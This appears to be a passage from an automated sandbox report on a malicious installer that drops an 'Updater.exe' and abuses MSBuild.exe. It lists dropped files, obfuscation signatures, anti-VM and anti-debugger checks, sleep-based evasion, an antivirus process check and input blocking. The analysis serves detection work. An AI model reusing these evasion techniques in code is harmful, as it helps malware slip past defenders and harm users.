Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Window found: window name: TMainForm Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 6172760 > 1048576
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdb source: file.exe, is-E0D1D.tmp.3.dr
Source: Binary string: wntdll.pdbUGP source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdbz source: file.exe, is-E0D1D.tmp.3.dr
Source: Binary string: wntdll.pdb source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_00B3310D
PE file contains an invalid checksum
Source: file.tmp.0.dr Static PE information: real checksum: 0x0 should be: 0x344343
Source: file.tmp.2.dr Static PE information: real checksum: 0x0 should be: 0x344343
Source: file.exe Static PE information: real checksum: 0x5ee9e5 should be: 0x5e3598
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name: .didata
Source: file.tmp.0.dr Static PE information: section name: .didata
Source: file.tmp.2.dr Static PE information: section name: .didata
Source: is-E0D1D.tmp.3.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B41046 push ecx; ret 35_2_00B41059
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140A165 push 0140A191h; ret 35_2_0140A189
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140A12D push 0140A159h; ret 35_2_0140A151
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013FA149 push 013FA175h; ret 35_2_013FA16D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013FA141 push 013FA175h; ret 35_2_013FA16D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140A1A3 push 0140A1D1h; ret 35_2_0140A1C9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140A1A5 push 0140A1D1h; ret 35_2_0140A1C9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01402089 push ecx; mov dword ptr [esp], ecx 35_2_0140208E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013FA0C9 push 013FA138h; ret 35_2_013FA130
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013FA0C7 push 013FA138h; ret 35_2_013FA130
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409344 push 01409388h; ret 35_2_01409380
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409345 push 01409388h; ret 35_2_01409380
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01400333 push 014003C9h; ret 35_2_014003C1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_014043F3 push 01404421h; ret 35_2_01404419
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_014043F5 push 01404421h; ret 35_2_01404419
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140039D push 014003C9h; ret 35_2_014003C1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_014043B3 push 014043E1h; ret 35_2_014043D9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_014043B5 push 014043E1h; ret 35_2_014043D9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01400211 push 01400287h; ret 35_2_0140027F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_014092ED push 01409321h; ret 35_2_01409319
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_014092F5 push 01409321h; ret 35_2_01409319
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01400289 push 01400331h; ret 35_2_01400329
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F3555 push 013F35A6h; ret 35_2_013F359E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01400400 push 0140044Eh; ret 35_2_01400446
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01400401 push 0140044Eh; ret 35_2_01400446
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F5479 push ecx; mov dword ptr [esp], eax 35_2_013F547A
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140A48B push 0140A4B9h; ret 35_2_0140A4B1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140A48D push 0140A4B9h; ret 35_2_0140A4B1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_014004B9 push 014004E5h; ret 35_2_014004DD
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409774 push 014097B8h; ret 35_2_014097B0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409775 push 014097B8h; ret 35_2_014097B0
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\NVFTVRDLL64.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-EUGF2.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\hangbird\is-7LJOT.tmp Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\nvfvsdksvc_x64.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-5MQFH.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\hangbird\Updater.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-E0D1D.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\ddETWExternal.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_isdecmp.dll Jump to dropped file
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00BB2558 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 35_2_00BB2558
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B35D03 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 35_2_00B35D03
Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe System information queried: FirmwareTableInformation Jump to behavior
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\NVFTVRDLL64.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-EUGF2.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\nvfvsdksvc_x64.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-5MQFH.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-E0D1D.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\ddETWExternal.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_isdecmp.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe API coverage: 5.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7628 Thread sleep time: -60000s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE Last function: Thread delayed
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8E180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 35_2_00B8E180
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9A187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 35_2_00B9A187
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9A2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 35_2_00B9A2E4
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9A66E FindFirstFileW,Sleep,FindNextFileW,FindClose, 35_2_00B9A66E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9686D FindFirstFileW,FindNextFileW,FindClose, 35_2_00B9686D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8E9BA GetFileAttributesW,FindFirstFileW,FindClose, 35_2_00B8E9BA
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B974F0 FindFirstFileW,FindClose, 35_2_00B974F0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B97591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime, 35_2_00B97591
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8DE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 35_2_00B8DE32
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F50B5 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 35_2_013F50B5
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F51BD FindFirstFileA,GetLastError, 35_2_013F51BD
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F29E5 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 35_2_013F29E5
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_00B3310D
Source: Updater.exe, 00000023.00000002.2227868489.0000000001417000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmware
Source: Updater.exe, Updater.exe, 00000023.00000003.2221324344.0000000001478000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227714652.0000000001389000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2221324344.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227868489.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227868489.0000000001417000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft hyper-v video
Source: MSBuild.exe, 00000024.00000002.2348303261.000000000124D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.tmp, 00000001.00000002.1684347888.0000000000D61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x
Source: file.tmp, 00000001.00000002.1684347888.0000000000D61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\*
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01403EA7 LdrInitializeThunk, 35_2_01403EA7
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9F607 BlockInput, 35_2_00B9F607
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B32D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 35_2_00B32D33
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_00B3310D
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B44BF4 mov eax, dword ptr fs:[00000030h] 35_2_00B44BF4
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01415AFE mov eax, dword ptr fs:[00000030h] 35_2_01415AFE
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409B8A mov eax, dword ptr fs:[00000030h] 35_2_01409B8A
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409B8A mov eax, dword ptr fs:[00000030h] 35_2_01409B8A
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409B91 mov eax, dword ptr fs:[00000030h] 35_2_01409B91
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409B91 mov eax, dword ptr fs:[00000030h] 35_2_01409B91
